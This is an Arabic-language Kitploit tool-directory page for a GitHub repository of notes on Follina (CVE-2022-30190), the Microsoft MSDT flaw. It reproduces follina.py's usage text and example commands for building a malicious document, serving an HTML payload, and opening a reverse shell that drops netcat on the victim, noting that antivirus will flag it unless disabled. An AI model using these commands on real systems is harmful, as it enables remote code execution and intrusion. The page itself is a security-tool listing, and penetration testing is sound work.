Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Follina — ملاحظات متعلقة بـ CVE-2022-30190 | Kitploit
أدوات/GitHubGitHub/abhirules27/follina
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubabhirules27/follina

Follina

ملاحظات متعلقة بـ CVE-2022-30190

عرض المستودع
16منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

فولينا

ملاحظات متعلقة بـ CVE-2022-30190

FOLLINA: CVE-2022-30190

  1. يستخدم أداة التشخيص والدعم من مايكروسوفت (MSDT)

  2. يستغل نافذة التشخيص المفتوحة للتشخيص، وعند تنفيذه بشكل صحيح، يمنح المهاجم وصول شل عكسي.

  3. Github: (a). https://github.com/JohnHammond/msdt-follina (b). https://github.com/chvancooten/follina.py

  4. شكراً لـ: (a). @_johnhammond (b). @networkchuck

  5. الاستخدام follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT] options: -h, --help show this help message and exit --command COMMAND, -c COMMAND command to run on the target (default: calc) --output OUTPUT, -o OUTPUT output maldoc file (default: ./follina.doc) --interface INTERFACE, -i INTERFACE network interface or IP address to host the HTTP server (default: eth0) --port PORT, -p PORT port to serve the HTTP server (default: 8000)

  6. أمثلة (a). تشغيل calc.exe: $ python3 follina.py
    [+] copied staging doc /tmp/9mcvbrwo [+] created maldoc ./follina.doc [+] serving html payload on :8000 (b). تشغيل notepad.exe: $ python3 follina.py -c "notepad" (c). الحصول على شل عكسي على المنفذ 9001. ملاحظة: هذا يقوم بتحميل ثنائي netcat على الضحية ويضعه في C:\Windows\Tasks. لا يقوم بتنظيف الثنائي. هذا سيؤدي إلى كشف من قبل برامج مكافحة الفيروسات ما لم يتم تعطيلها. $ python3 follina.py -r 9001

تنزيل الأداة